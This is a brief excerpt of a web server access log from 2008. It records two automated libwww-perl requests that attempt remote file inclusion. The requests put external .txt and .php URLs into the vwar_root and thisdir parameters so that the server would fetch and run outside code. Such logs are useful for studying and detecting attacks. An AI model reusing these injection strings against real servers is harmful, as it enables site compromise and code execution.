62.117.106.4 - - [23/Apr/2008:13:18:36 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:13:18:37 -0700] "GET /?thisdir=http://www.spacecolonization.net/2080/var_cache/ed4n.php?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
